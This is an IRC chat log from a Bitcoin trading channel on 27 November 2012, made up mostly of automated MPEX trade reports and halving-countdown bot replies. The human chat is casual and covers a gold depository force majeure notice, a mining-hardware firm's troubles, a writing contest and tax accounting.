[S.MPOE] 2345 @ 0.00052031 = 1.2201 BTC [+] Nov 27 10:16:22 [MPEX] [S.MPOE] 17155 @ 0.00052045 = 8.9283 BTC [+] Nov 27 10:20:51 [MPEX] [S.MPOE] 3188 @ 0.00052045 = 1.6592 BTC [+] Nov 27 10:29:10 [MPEX] [S.MPOE] 2345 @ 0.00051946 = 1.2181 BTC [-] Nov 27 10:29:11 [MPEX] [S.MPOE] 6855 @ 0.00051921 = 3.5592 BTC [-] Nov 27 10:32:44 [MPEX] [S.MPOE] 12245 @ 0.00051921 = 6.3577 BTC [-] Nov 27 10:32:45 [MPEX] [S.MPOE] 8536 @ 0.00051355 = 4.3837 BTC [-] Nov 27 10:37:45 [MPEX] [S.MPOE] 2345 @ 0.00052014 = 1.2197 BTC [+] Nov 27 10:37:47 [MPEX] [S.MPOE] 1057 @ 0.00052045 = 0.5501 BTC [+] Nov 27 10:37:48 [MPEX] [S.MPOE] 3898 @ 0.00052126 = 2.0319 BTC [+] Nov 27 10:39:14 ;;bc,rewardhalf Nov 27 10:39:14 Error: "bc,rewardhalf" is not a valid command. Nov 27 10:39:44 ;;halfreward Nov 27 10:39:45 Estimated time of bitcoin block reward halving: Wed Nov 28 19:39:45 2012 UTC | Time remaining: 1 day, 11 hours, and 0 seconds. Nov 27 10:42:42 [MPEX] [S.MPOE] 2345 @ 0.00051388 = 1.205 BTC [-] Nov 27 10:42:43 [MPEX] [S.MPOE] 10188 @ 0.00051355 = 5.232 BTC [-] Nov 27 10:43:35 dun dun dun Nov 27 10:48:03 [MPEX] [S.MPOE] 5550 @ 0.00051355 = 2.8502 BTC [-] Nov 27 10:48:39 dun? what is that? Nov 27 10:55:41 http://dundundun.net/ Nov 27 10:58:20 nowai Nov 27 11:00:59 [MPEX] [S.MPOE] 4887 @ 0.00051355 = 2.5097 BTC [-] Nov 27 11:01:01 [MPEX] [S.MPOE] 10998 @ 0.00051313 = 5.6434 BTC [-] Nov 27 11:14:49 [MPEX] [S.MPOE] 13702 @ 0.00051313 = 7.0309 BTC [-] Nov 27 11:14:50 [MPEX] [S.MPOE] 360 @ 0.00051312 = 0.1847 BTC [-] Nov 27 11:16:36 [MPEX] [S.MPOE] 5000 @ 0.00051312 = 2.5656 BTC [-] Nov 27 11:23:06 [MPEX] [S.DICE] 1445 @ 0.00334522 = 4.8338 BTC [-] Nov 27 11:23:08 [MPEX] [S.DICE] 355 @ 0.00335332 = 1.1904 BTC [+] Nov 27 11:28:57 [MPEX] [S.MPOE] 19490 @ 0.00051312 = 10.0007 BTC [-] Nov 27 11:28:59 [MPEX] [S.MPOE] 7610 @ 0.00051284 = 3.9027 BTC [-] Nov 27 11:33:06 [MPEX] [S.MPOE] 2345 @ 0.0005167 = 1.2117 BTC [+] Nov 27 11:33:07 [MPEX] [S.MPOE] 18655 @ 0.00051704 = 9.6454 BTC [+] Nov 27 11:37:32 [MPEX] [S.MPOE] 1600 @ 0.00051313 = 0.821 BTC [-] Nov 27 11:37:34 [MPEX] [S.MPOE] 8478 @ 0.00051284 = 4.3479 BTC [-] Nov 27 11:37:35 [MPEX] [S.MPOE] 7222 @ 0.00051275 = 3.7031 BTC [-] Nov 27 11:52:03 [MPEX] [S.MPOE] 2345 @ 0.00051281 = 1.2025 BTC [+] Nov 27 11:52:04 [MPEX] [S.MPOE] 13578 @ 0.00051275 = 6.9621 BTC [-] Nov 27 11:52:06 [MPEX] [S.MPOE] 1227 @ 0.00051244 = 0.6288 BTC [-] Nov 27 11:55:11 [MPEX] [S.MPOE] 2345 @ 0.00051489 = 1.2074 BTC [+] Nov 27 11:55:13 [MPEX] [S.MPOE] 7505 @ 0.00051507 = 3.8656 BTC [+] Nov 27 12:04:03 [MPEX] [S.MPOE] 2345 @ 0.00051251 = 1.2018 BTC [-] Nov 27 12:04:04 [MPEX] [S.MPOE] 4355 @ 0.00051244 = 2.2317 BTC [-] Nov 27 12:07:05 [MPEX] [S.MPOE] 1750 @ 0.00051244 = 0.8968 BTC [-] Nov 27 12:10:40 [MPEX] [S.MPOE] 2345 @ 0.00051477 = 1.2071 BTC [+] Nov 27 12:10:41 [MPEX] [S.MPOE] 8355 @ 0.00051507 = 4.3034 BTC [+] Nov 27 12:12:32 [MPEX] [S.MPOE] 2345 @ 0.00051258 = 1.202 BTC [-] Nov 27 12:12:33 [MPEX] [S.MPOE] 27754 @ 0.00051244 = 14.2223 BTC [-] Nov 27 12:12:35 [MPEX] [S.MPOE] 11801 @ 0.0005124 = 6.0468 BTC [-] Nov 27 12:16:46 [MPEX] [S.MPOE] 28899 @ 0.0005124 = 14.8078 BTC [-] Nov 27 12:16:48 [MPEX] [S.MPOE] 5151 @ 0.00051226 = 2.6387 BTC [-] Nov 27 12:17:46 [MPEX] [S.MPOE] 8512 @ 0.00051226 = 4.3604 BTC [-] Nov 27 12:18:31 [MPEX] [S.MPOE] 3537 @ 0.00051226 = 1.8119 BTC [-] Nov 27 12:18:33 [MPEX] [S.MPOE] 1863 @ 0.00051225 = 0.9543 BTC [-] Nov 27 12:26:29 [MPEX] [S.MPOE] 1850 @ 0.00051491 = 0.9526 BTC [+] Nov 27 12:34:49 [MPEX] [S.MPOE] 495 @ 0.00051491 = 0.2549 BTC [+] Nov 27 12:34:51 [MPEX] [S.MPOE] 11273 @ 0.00051507 = 5.8064 BTC [+] Nov 27 12:38:13 [MPEX] [S.MPOE] 2345 @ 0.0005126 = 1.202 BTC [-] Nov 27 12:38:15 [MPEX] [S.MPOE] 16055 @ 0.00051225 = 8.2242 BTC [-] Nov 27 12:45:24 [MPEX] [S.MPOE] 2345 @ 0.00051481 = 1.2072 BTC [+] Nov 27 12:45:25 [MPEX] [S.MPOE] 6358 @ 0.00051507 = 3.2748 BTC [+] Nov 27 12:45:26 [MPEX] [S.MPOE] 8795 @ 0.00051704 = 4.5474 BTC [+] Nov 27 12:45:28 [MPEX] [S.MPOE] 10202 @ 0.00051733 = 5.2778 BTC [+] Nov 27 13:09:10 zup all Nov 27 13:09:18 ;;btchalf Nov 27 13:09:18 Error: "btchalf" is not a valid command. Nov 27 13:09:24 ;;half Nov 27 13:09:24 Error: "half" is not a valid command. Nov 27 13:09:30 damn it i fail at commands Nov 27 13:15:02 [MPEX] [S.MPOE] 12600 @ 0.00051355 = 6.4707 BTC [-] Nov 27 13:15:03 [MPEX] [S.MPOE] 12048 @ 0.00051733 = 6.2328 BTC [+] Nov 27 13:15:04 [MPEX] [S.MPOE] 28452 @ 0.00051736 = 14.7199 BTC [+] Nov 27 13:16:22 [MPEX] [S.MPOE] 17490 @ 0.00051736 = 9.0486 BTC [+] Nov 27 13:16:23 [MPEX] [S.MPOE] 1310 @ 0.00051823 = 0.6789 BTC [+] Nov 27 13:17:13 !halfreward Nov 27 13:17:27 ;;halfreward Nov 27 13:17:28 Estimated time of bitcoin block reward halving: Wed Nov 28 18:37:28 2012 UTC | Time remaining: 1 day, 7 hours, 20 minutes, and 0 seconds. Nov 27 13:19:15 [MPEX] [S.MPOE] 2345 @ 0.00051282 = 1.2026 BTC [-] Nov 27 13:19:17 [MPEX] [S.MPOE] 10700 @ 0.00051259 = 5.4847 BTC [-] Nov 27 13:19:18 [MPEX] [S.MPOE] 3184 @ 0.00051225 = 1.631 BTC [-] Nov 27 13:19:19 [MPEX] [S.MPOE] 3247 @ 0.00051208 = 1.6627 BTC [-] Nov 27 13:21:23 [MPEX] [S.MPOE] 2345 @ 0.00051793 = 1.2145 BTC [+] Nov 27 13:24:23 [MPEX] [S.MPOE] 35857 @ 0.00051823 = 18.5822 BTC [+] Nov 27 13:26:45 [MPEX] [S.DICE] 300 @ 0.00334119 = 1.0024 BTC [-] Nov 27 13:28:53 [MPEX] [S.MPOE] 183 @ 0.00051823 = 0.0948 BTC [+] Nov 27 13:28:54 [MPEX] [S.MPOE] 9776 @ 0.00051846 = 5.0685 BTC [+] Nov 27 13:28:56 [MPEX] [S.MPOE] 13341 @ 0.00051854 = 6.9178 BTC [+] Nov 27 13:32:49 [MPEX] [S.MPOE] 2345 @ 0.00051801 = 1.2147 BTC [-] Nov 27 13:32:50 [MPEX] [S.MPOE] 1555 @ 0.00051795 = 0.8054 BTC [-] Nov 27 13:41:15 [MPEX] [S.MPOE] 13950 @ 0.00051795 = 7.2254 BTC [-] Nov 27 13:45:16 [MPEX] [S.MPOE] 20664 @ 0.0005175 = 10.6936 BTC [-] Nov 27 13:47:46 [MPEX] [S.MPOE] 5486 @ 0.0005175 = 2.839 BTC [-] Nov 27 13:47:47 [MPEX] [S.MPOE] 2264 @ 0.00051208 = 1.1593 BTC [-] Nov 27 13:50:49 [MPEX] [S.MPOE] 24589 @ 0.00051208 = 12.5915 BTC [-] Nov 27 13:50:50 [MPEX] [S.MPOE] 5911 @ 0.00051203 = 3.0266 BTC [-] Nov 27 14:12:53 [MPEX] [S.MPOE] 2750 @ 0.00051203 = 1.4081 BTC [-] Nov 27 14:13:53 [MPEX] [S.MPOE] 1150 @ 0.00051774 = 0.5954 BTC [+] Nov 27 14:13:54 [MPEX] [S.MPOE] 2345 @ 0.00051846 = 1.2158 BTC [+] Nov 27 14:13:55 [MPEX] [S.MPOE] 4624 @ 0.00051854 = 2.3977 BTC [+] Nov 27 14:16:08 [MPEX] [S.MPOE] 2032 @ 0.00051854 = 1.0537 BTC [+] Nov 27 14:30:17 [MPEX] [S.MPOE] 8010 @ 0.00052043 = 4.1686 BTC [+] Nov 27 14:30:18 [MPEX] [S.MPOE] 1000 @ 0.00052078 = 0.5208 BTC [+] Nov 27 14:30:20 [MPEX] [S.MPOE] 6106 @ 0.00052079 = 3.1799 BTC [+] Nov 27 14:31:43 [MPEX] [S.MPOE] 7294 @ 0.00052079 = 3.7986 BTC [+] Nov 27 14:31:45 [MPEX] [S.MPOE] 8168 @ 0.00052091 = 4.2548 BTC [+] Nov 27 14:37:02 [MPEX] [S.MPOE] 2345 @ 0.00051977 = 1.2189 BTC [-] Nov 27 14:37:04 [MPEX] [S.MPOE] 7274 @ 0.00051954 = 3.7791 BTC [-] Nov 27 14:44:21 [MPEX] [S.MPOE] 1194 @ 0.00051954 = 0.6203 BTC [-] Nov 27 14:48:25 [MPEX] [S.MPOE] 8706 @ 0.00051789 = 4.5088 BTC [-] Nov 27 14:48:27 [MPEX] [S.MPOE] 2345 @ 0.00052086 = 1.2214 BTC [+] Nov 27 14:48:28 [MPEX] [S.MPOE] 1000 @ 0.0005209 = 0.5209 BTC [+] Nov 27 14:48:29 [MPEX] [S.MPOE] 4936 @ 0.00052091 = 2.5712 BTC [+] Nov 27 15:10:32 [MPEX] [S.MPOE] 18446 @ 0.00052091 = 9.6087 BTC [+] Nov 27 15:10:33 [MPEX] [S.MPOE] 15054 @ 0.00052126 = 7.847 BTC [+] Nov 27 15:14:37 [MPEX] [S.MPOE] 5121 @ 0.00052126 = 2.6694 BTC [+] Nov 27 15:14:37 [MPEX] [S.MPOE] 14300 @ 0.00052146 = 7.4569 BTC [+] Nov 27 15:14:39 [MPEX] [S.MPOE] 16850 @ 0.00052229 = 8.8006 BTC [+] Nov 27 15:14:40 [MPEX] [S.MPOE] 6573 @ 0.00052253 = 3.4346 BTC [+] Nov 27 15:14:41 [MPEX] [S.MPOE] 2956 @ 0.00052336 = 1.5471 BTC [+] Nov 27 15:28:40 [MPEX] [S.MPOE] 2345 @ 0.0005204 = 1.2203 BTC [-] Nov 27 15:28:42 [MPEX] [S.MPOE] 13900 @ 0.00052036 = 7.233 BTC [-] Nov 27 15:28:43 [MPEX] [S.MPOE] 9622 @ 0.0005171 = 4.9755 BTC [-] Nov 27 15:34:29 [MPEX] [S.MPOE] 2345 @ 0.00052308 = 1.2266 BTC [+] Nov 27 15:34:29 [MPEX] [S.MPOE] 10755 @ 0.00052336 = 5.6287 BTC [+] Nov 27 15:44:13 [MPEX] [S.MPOE] 2345 @ 0.00052321 = 1.2269 BTC [-] Nov 27 15:44:14 [MPEX] [S.MPOE] 5505 @ 0.00052336 = 2.8811 BTC [+] Nov 27 15:56:37 [MPEX] [S.MPOE] 2345 @ 0.00051756 = 1.2137 BTC [-] Nov 27 15:56:37 [MPEX] [S.MPOE] 22255 @ 0.00051738 = 11.5143 BTC [-] Nov 27 16:02:33 [MPEX] [S.MPOE] 2345 @ 0.00052309 = 1.2266 BTC [+] Nov 27 16:02:34 [MPEX] [S.MPOE] 7819 @ 0.00052336 = 4.0922 BTC [+] Nov 27 16:02:36 [MPEX] [S.MPOE] 7011 @ 0.00052351 = 3.6703 BTC [+] Nov 27 16:02:37 [MPEX] [S.MPOE] 925 @ 0.00052382 = 0.4845 BTC [+] Nov 27 16:07:18 [MPEX] [S.MPOE] 10450 @ 0.00052382 = 5.4739 BTC [+] Nov 27 16:10:01 [MPEX] [S.MPOE] 2345 @ 0.00051749 = 1.2135 BTC [-] Nov 27 16:10:02 [MPEX] [S.MPOE] 3845 @ 0.00051738 = 1.9893 BTC [-] Nov 27 16:10:03 [MPEX] [S.MPOE] 11310 @ 0.0005171 = 5.8484 BTC [-] Nov 27 16:15:24 [MPEX] [S.MPOE] 2345 @ 0.00052355 = 1.2277 BTC [+] Nov 27 16:15:25 [MPEX] [S.MPOE] 825 @ 0.00052382 = 0.4322 BTC [+] Nov 27 16:15:26 [MPEX] [S.MPOE] 4808 @ 0.00052414 = 2.5201 BTC [+] Nov 27 16:15:27 [MPEX] [S.MPOE] 1000 @ 0.00052417 = 0.5242 BTC [+] Nov 27 16:15:28 [MPEX] [S.MPOE] 18272 @ 0.00052418 = 9.5778 BTC [+] Nov 27 16:39:49 [MPEX] [S.DICE] 800 @ 0.00334119 = 2.673 BTC [-] Nov 27 16:40:12 ;;halfreward Nov 27 16:40:13 Estimated time of bitcoin block reward halving: Wed Nov 28 18:40:13 2012 UTC | Time remaining: 1 day, 4 hours, and 0 seconds. Nov 27 16:42:58 [MPEX] [S.MPOE] 2345 @ 0.00051711 = 1.2126 BTC [-] Nov 27 16:43:00 [MPEX] [S.MPOE] 6373 @ 0.0005171 = 3.2955 BTC [-] Nov 27 16:43:01 [MPEX] [S.MPOE] 7135 @ 0.00051576 = 3.6799 BTC [-] Nov 27 16:43:02 [MPEX] [S.MPOE] 5347 @ 0.0005122 = 2.7387 BTC [-] Nov 27 16:50:35 [MPEX] [S.MPOE] 2345 @ 0.00052392 = 1.2286 BTC [+] Nov 27 16:50:36 [MPEX] [S.MPOE] 2931 @ 0.00052418 = 1.5364 BTC [+] Nov 27 16:50:37 [MPEX] [S.MPOE] 15724 @ 0.00052421 = 8.2427 BTC [+] Nov 27 16:54:08 [MPEX] [S.MPOE] 2269 @ 0.00052421 = 1.1894 BTC [+] Nov 27 17:00:46 hello Kumala Nov 27 17:00:48 ;;ticker Nov 27 17:00:48 BTCUSD ticker | Best bid: 11.95000, Best ask: 11.99998, Bid-ask spread: 0.04998, Last trade: 11.99999, 24 hour volume: 43477.60197387, 24 hour low: 11.89000, 24 hour high: 12.55800, 24 hour vwap: 12.17801 Nov 27 17:02:07 [MPEX] [S.DICE] 245 @ 0.00335332 = 0.8216 BTC [+] Nov 27 17:11:34 [MPEX] [S.MPOE] 2345 @ 0.00052284 = 1.2261 BTC [-] Nov 27 17:11:36 [MPEX] [S.MPOE] 12737 @ 0.00052253 = 6.6555 BTC [-] Nov 27 17:14:53 [MPEX] [S.MPOE] 2345 @ 0.00052407 = 1.2289 BTC [+] Nov 27 17:14:54 [MPEX] [S.MPOE] 1799 @ 0.00052421 = 0.9431 BTC [+] Nov 27 17:17:43 [MPEX] [S.MPOE] 2345 @ 0.00052266 = 1.2256 BTC [-] Nov 27 17:17:45 [MPEX] [S.MPOE] 3144 @ 0.00052253 = 1.6428 BTC [-] Nov 27 17:17:46 [MPEX] [S.MPOE] 8761 @ 0.00051642 = 4.5244 BTC [-] Nov 27 17:21:41 [MPEX] [S.MPOE] 2345 @ 0.00051669 = 1.2116 BTC [+] Nov 27 17:21:43 [MPEX] [S.MPOE] 8464 @ 0.00051642 = 4.371 BTC [-] Nov 27 17:21:44 [MPEX] [S.MPOE] 11300 @ 0.00051607 = 5.8316 BTC [-] Nov 27 17:21:45 [MPEX] [S.MPOE] 391 @ 0.00051602 = 0.2018 BTC [-] Nov 27 17:28:11 Lobbyist Michael Kiok, who lives with his dog Cassie, told the newspaper there were more than 100,000 zoophiles in Germany. Nov 27 17:28:15 lmao this is hysterical Nov 27 17:28:20 http://www.dailytelegraph.com.au/news/world/germany-to-ban-sex-with-animals-report Nov 27 17:28:51 [MPEX] [S.MPOE] 16334 @ 0.00051602 = 8.4287 BTC [-] Nov 27 17:30:16 page 404 Nov 27 17:31:21 wtf i just read it Nov 27 17:31:28 [MPEX] [S.MPOE] 8161 @ 0.00051602 = 4.2112 BTC [-] Nov 27 17:32:02 yeah, weird. just says: We could not find the page you requested. This is either because: bla bla bla Nov 27 17:32:31 the telegraph site comes up, but the article itself seems to be missing from their database or someweird shit Nov 27 17:34:30 well it wasn't any big deal, just a write-up about some campaign trying to make animal fucking illegal again Nov 27 17:34:41 http://www.foxbusiness.com/news/2012/11/26/cme-declares-force-majeure-at-manhattan-gold-depository/ Nov 27 17:34:44 now this is juicy. Nov 27 17:35:13 [MPEX] [S.MPOE] 4253 @ 0.0005122 = 2.1784 BTC [-] Nov 27 17:35:15 [MPEX] [S.MPOE] 17089 @ 0.00051203 = 8.7501 BTC [-] Nov 27 17:35:16 [MPEX] [S.MPOE] 9600 @ 0.00051191 = 4.9143 BTC [-] Nov 27 17:35:17 [MPEX] [S.MPOE] 8908 @ 0.0005119 = 4.56 BTC [-] Nov 27 17:35:20 did the gold just float away? Nov 27 17:36:05 lol Nov 27 17:36:11 no, it was opperationally limitated. Nov 27 17:36:50 nothing juicy at all "CME said that individuals holding MTB warrants, or certificates for a specific lot of metal stored in the depository, may receive gold delivered from Brinks Co. (BCO) in New York. MTB is responsible for any additional costs incurred by customers receiving metal from Brinks, CME said" Nov 27 17:38:42 i guess you don't know what "may" means. Nov 27 17:38:58 actually Nov 27 17:39:02 thats contextual Nov 27 17:39:10 in this case, they are using it as "can" Nov 27 17:39:24 wel Nov 27 17:39:27 either way Nov 27 17:39:29 maybe they are, yes. Nov 27 17:39:31 mircea_popescu: read what Ukto writes ... Nov 27 17:39:57 they are saying that they will fullfill contracts.. be it from them, or it may come from brinks Nov 27 17:40:01 not that the contracts may be honored Nov 27 17:40:19 the way I read it at least Nov 27 17:40:35 it is vauge wording though Nov 27 17:41:03 you don't really call fm if you intend to enforce the contract at no cost to the op. Nov 27 17:42:51 its the ole "sorry, can't deliver your gold on contract because of act of god..." excuse ;P Nov 27 17:43:10 mod6: lol Nov 27 17:43:21 "sorry, can't deliver your gold on contract for gold we never actually had because of act of god... Nov 27 17:43:23 fify. Nov 27 17:43:57 haha ty Nov 27 17:50:43 [MPEX] [S.MPOE] 6492 @ 0.0005119 = 3.3233 BTC [-] Nov 27 17:50:45 [MPEX] [S.MPOE] 16100 @ 0.00051181 = 8.2401 BTC [-] Nov 27 17:50:46 [MPEX] [S.MPOE] 5556 @ 0.00051166 = 2.8428 BTC [-] Nov 27 17:56:26 copumpkin: my question is, how come everyone in these sorts of questions haven't been paying taxes for years Nov 27 17:56:42 fucking leeches! Nov 27 17:56:51 s/haven't/hasn't/ Nov 27 17:56:52 those welfare queens buying italian pizza ovens Nov 27 17:56:59 lol Nov 27 18:01:01 [MPEX] [S.MPOE] 17000 @ 0.00051248 = 8.7122 BTC [+] Nov 27 18:06:44 http://trilema.com/2012/voluntary-contracts-after-a-while/#comment-90702 <<< extended by 2 weeks! Nov 27 18:07:06 sgnb sgornick smickles Smoovious SomeoneWeird SuprTiggr Nov 27 18:07:12 smickles what sorts of questions ? Nov 27 18:10:52 [MPEX] [S.MPOE] 10089 @ 0.00051308 = 5.1765 BTC [+] Nov 27 18:10:54 [MPEX] [S.MPOE] 12335 @ 0.00052421 = 6.4661 BTC [+] Nov 27 18:10:55 [MPEX] [S.MPOE] 3576 @ 0.00052436 = 1.8751 BTC [+] Nov 27 18:13:31 [MPEX] [S.MPOE] 2345 @ 0.00052433 = 1.2296 BTC [-] Nov 27 18:13:32 [MPEX] [S.MPOE] 7955 @ 0.00052436 = 4.1713 BTC [+] Nov 27 18:17:15 [MPEX] [S.MPOE] 2345 @ 0.00051256 = 1.202 BTC [-] Nov 27 18:17:16 [MPEX] [S.MPOE] 6850 @ 0.00051248 = 3.5105 BTC [-] Nov 27 18:17:18 [MPEX] [S.MPOE] 13894 @ 0.00051166 = 7.109 BTC [-] Nov 27 18:17:19 [MPEX] [S.MPOE] 3511 @ 0.00051165 = 1.7964 BTC [-] Nov 27 18:17:34 mircea_popescu: I linked to http://snapplr.com/gg28 last night Nov 27 18:18:01 doing things behind my back eh ? Nov 27 18:19:34 hm, i must be dense. why is the taxpayer liable for more tax if the tax was cut 0.0 Nov 27 18:19:36 [MPEX] [S.MPOE] 5500 @ 0.00051165 = 2.8141 BTC [-] Nov 27 18:20:17 mircea_popescu fuzzy maffs Nov 27 18:20:50 lol i c Nov 27 18:23:15 what is that? "voluntary-contracts-after-a-while/#comment-90702 <<< extended by 2 weeks!" Nov 27 18:24:23 there's a writing contest with something over 100btc in prize funds. Nov 27 18:24:34 it was originally due to end yest. Nov 27 18:25:42 [MPEX] [S.MPOE] 881 @ 0.00051165 = 0.4508 BTC [-] Nov 27 18:25:43 [MPEX] [S.MPOE] 5105 @ 0.00051146 = 2.611 BTC [-] Nov 27 18:33:35 [MPEX] [S.MPOE] 2345 @ 0.00052408 = 1.229 BTC [+] Nov 27 18:33:36 [MPEX] [S.MPOE] 26205 @ 0.00052436 = 13.7409 BTC [+] Nov 27 18:50:06 [MPEX] [S.MPOE] 5489 @ 0.00051472 = 2.8253 BTC [-] Nov 27 18:57:42 [MPEX] [S.MPOE] 13500 @ 0.00051472 = 6.9487 BTC [-] Nov 27 19:06:21 [MPEX] [S.MPOE] 2345 @ 0.00051471 = 1.207 BTC [-] Nov 27 19:06:23 [MPEX] [S.MPOE] 216 @ 0.00051472 = 0.1112 BTC [+] Nov 27 19:06:24 [MPEX] [S.MPOE] 524 @ 0.00052436 = 0.2748 BTC [+] Nov 27 19:06:25 [MPEX] [S.MPOE] 3300 @ 0.00052457 = 1.7311 BTC [+] Nov 27 19:08:32 [MPEX] [S.MPOE] 10515 @ 0.00052461 = 5.5163 BTC [+] Nov 27 19:10:44 [MPEX] [S.MPOE] 19890 @ 0.00051862 = 10.3154 BTC [-] Nov 27 19:10:46 [MPEX] [S.MPOE] 10360 @ 0.0005252 = 5.4411 BTC [+] Nov 27 19:13:39 [MPEX] [S.MPOE] 5840 @ 0.0005252 = 3.0672 BTC [+] Nov 27 19:13:40 [MPEX] [S.MPOE] 13962 @ 0.0005253 = 7.3342 BTC [+] Nov 27 19:17:41 16:24 < mircea_popescu> it was originally due to end yest. <<< sweet, an extension? The thing I'm writing got put off because I had to do other things, maybe now I can finish it :) Nov 27 19:18:18 yeah. Nov 27 19:20:52 i tried to subcontract the story, only one writer understood it, and finished it late and it still deals heavily with law enforcement Nov 27 19:21:14 hope he'll improve it in the 2 weeks. Nov 27 19:21:47 [MPEX] [S.MPOE] 8000 @ 0.00051962 = 4.157 BTC [-] Nov 27 19:23:09 should have tried to write something myself instead... maybe I'd surprise myself like dong that cherry truck Nov 27 19:24:35 *the story deals with law enforcement, not the writer. lmao Nov 27 19:30:59 "…as a point of fact if you couldn’t defend yourself in any criminal proceeding whatsoever right now, you’re already in prison." oooh, zing Nov 27 19:31:33 lol subcontracted story. how much you pay him ? Nov 27 19:32:26 http://live.coinbr.com/?mpsic=S.MPOE hey, i like the curve Nov 27 19:32:29 looks like a hip. Nov 27 19:34:05 smickles :D Nov 27 19:34:35 [MPEX] [S.MPOE] 12900 @ 0.00052049 = 6.7143 BTC [+] Nov 27 19:37:12 i paid $42 Nov 27 19:37:17 for the story Nov 27 19:39:13 jurov: before or after they didn't deliver on time? Nov 27 19:40:02 [MPEX] [S.MPOE] 4500 @ 0.00052049 = 2.3422 BTC [+] Nov 27 19:40:03 after... i already have a dispute with a scammer on that project, so i said, fuck that i dont need another one Nov 27 19:40:03 [MPEX] [S.MPOE] 5750 @ 0.00051962 = 2.9878 BTC [-] Nov 27 19:40:04 [MPEX] [S.MPOE] 12450 @ 0.00051397 = 6.3989 BTC [-] Nov 27 19:40:16 oh my Nov 27 19:40:57 and in the middle suddenly vworker got sold to freelance, several days it was nearly unusable Nov 27 19:41:10 so i can say there was executive meddling, too :D Nov 27 19:45:12 still i don't get why freelancer.com is #1 . simple task like moving a deadline requires emailing to support both for employer and worker, wtf? Nov 27 19:45:43 [MPEX] [S.MPOE] 2345 @ 0.00051432 = 1.2061 BTC [+] Nov 27 19:45:45 [MPEX] [S.MPOE] 20310 @ 0.00051397 = 10.4387 BTC [-] Nov 27 19:52:44 [MPEX] [S.MPOE] 2345 @ 0.00051418 = 1.2058 BTC [+] Nov 27 19:52:45 [MPEX] [S.MPOE] 32697 @ 0.00051397 = 16.8053 BTC [-] Nov 27 19:52:47 [MPEX] [S.MPOE] 558 @ 0.00051294 = 0.2862 BTC [-] Nov 27 19:53:24 [MPEX] [S.DICE] 6555 @ 0.00337618 = 22.1309 BTC [+] Nov 27 19:53:25 [MPEX] [S.DICE] 495 @ 0.00334119 = 1.6539 BTC [-] Nov 27 19:56:06 [MPEX] [S.MPOE] 4211 @ 0.00051294 = 2.16 BTC [-] Nov 27 20:03:53 [MPEX] [S.MPOE] 18200 @ 0.00051837 = 9.4343 BTC [+] Nov 27 20:04:09 Ah, OTC has nothing to say about it. Nov 27 20:04:24 http://www.namworld.com/x-buttons.html Nov 27 20:04:40 How does that look? Nov 27 20:05:49 i like the blue buttons Nov 27 20:05:55 happy? Nov 27 20:06:47 Eh, just wanted to know if they looked fine. Bootstrap inspired of course. Nov 27 20:07:08 pigeons: I shipped your stuff Nov 27 20:07:18 But I made them less tall and more pronounced. Nov 27 20:07:20 lets hope this takes less than 30 days :) Nov 27 20:07:25 pigeons ordered drugs from you EskimoBob? Nov 27 20:07:32 snow Nov 27 20:07:42 lots of melting snow and polar bear shit Nov 27 20:07:47 neat Nov 27 20:07:53 with moss and stuff Nov 27 20:07:57 he usually just buys drugs from me Nov 27 20:08:13 OK, i guess he has made some changes to his menu Nov 27 20:08:25 jcpham: what are you selling? Nov 27 20:08:47 cocaine-infused air molecules Nov 27 20:08:54 pretty high-grade shit Nov 27 20:09:26 jurov so 42 for a chance at 5 btc prize ? Nov 27 20:09:33 yummy jcpham Nov 27 20:09:50 yes. i hoped for 1st prize, too Nov 27 20:09:57 Namjies pretty good Nov 27 20:13:00 https://bitcointalk.org/index.php?topic=128019.0 Nov 27 20:13:06 LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOoooooooooooooooooooooooooo........... Nov 27 20:13:43 ..............oooooooooooooooOOOOOOOOOOOOOLLLLLLLLL Nov 27 20:15:33 [MPEX] [S.MPOE] 2345 @ 0.00051815 = 1.2151 BTC [-] Nov 27 20:15:34 [MPEX] [S.MPOE] 2105 @ 0.00051822 = 1.0909 BTC [+] Nov 27 20:16:07 so basically bfl just went bankrupt. Nov 27 20:16:26 [MPEX] [S.MPOE] 2345 @ 0.00051675 = 1.2118 BTC [-] Nov 27 20:16:27 [MPEX] [S.MPOE] 1555 @ 0.0005167 = 0.8035 BTC [-] Nov 27 20:16:35 mircea_popescu: EXTRA bankrupt Nov 27 20:16:47 this is the sound of several thousand investors shitting their pants in unison Nov 27 20:16:56 its sort of wet and cheaky. Nov 27 20:16:58 investors? Nov 27 20:17:13 jcpham: they're not preorder customers. Nov 27 20:17:17 jcpham they had a backer. Nov 27 20:17:24 and obviously, all the people sending them free money. Nov 27 20:17:25 bfl needs to stop referring to them in such an improper way Nov 27 20:17:37 maybe i didn't read the whole thread? Nov 27 20:18:19 it's funny that not even a week ago inaba was intimating bfl is worth more than mpex Nov 27 20:18:31 turns out it was worth more in the sense glbse was worth more : Nov 27 20:18:33 worth more jailtime. Nov 27 20:18:48 mircea_popescu: it's deferred tax Nov 27 20:19:03 a ok then. Nov 27 20:19:35 you don't pay more tax than you would otherwise, but due to the discrepancy between your accounts and the tax reports, you need to adjust your accounts to factor in the increased rate Nov 27 20:19:42 [MPEX] [S.MPOE] 22495 @ 0.0005167 = 11.6232 BTC [-] Nov 27 20:19:46 but the tax rate did go up, so you would pay more tax Nov 27 20:19:51 it's just a huge pain in the ass to account for it Nov 27 20:20:40 [MPEX] [S.MPOE] 6205 @ 0.00051605 = 3.2021 BTC [-] Nov 27 20:20:40 [MPEX] [S.MPOE] 2345 @ 0.0005182 = 1.2152 BTC [+] Nov 27 20:20:42 [MPEX] [S.MPOE] 15250 @ 0.00051822 = 7.9029 BTC [+] Nov 27 20:20:44 ;;rewardhalf Nov 27 20:20:45 Error: "rewardhalf" is not a valid command. Nov 27 20:20:47 copumpkin didn't the tax rate go down ? 41 to 31 ? Nov 27 20:20:50 ;;halfreward Nov 27 20:20:51 Estimated time of bitcoin block reward halving: Wed Nov 28 18:50:51 2012 UTC | Time remaining: 1 day, 0 hours, 30 minutes, and 0 seconds. Nov 27 20:20:53 oh, maybe it did Nov 27 20:20:54 ;;half Nov 27 20:20:55 Error: "half" is not a valid command. Nov 27 20:20:59 I haven't looked at the question since earlier Nov 27 20:21:03 I have 24 hours to produce a block :< Nov 27 20:21:03 lolk. well... Nov 27 20:21:08 can we have an irc party Nov 27 20:21:12 when it halves Nov 27 20:21:12 oh yeah, it did go down Nov 27 20:21:18 anyway, whatever it is, you need to account for it :) Nov 27 20:21:23 it's stupid Nov 27 20:22:22 Diablo-D3 maybe we can organize prayer marathon for you Nov 27 20:22:31 copumpkin we're having a;;halfreward party at cathy's 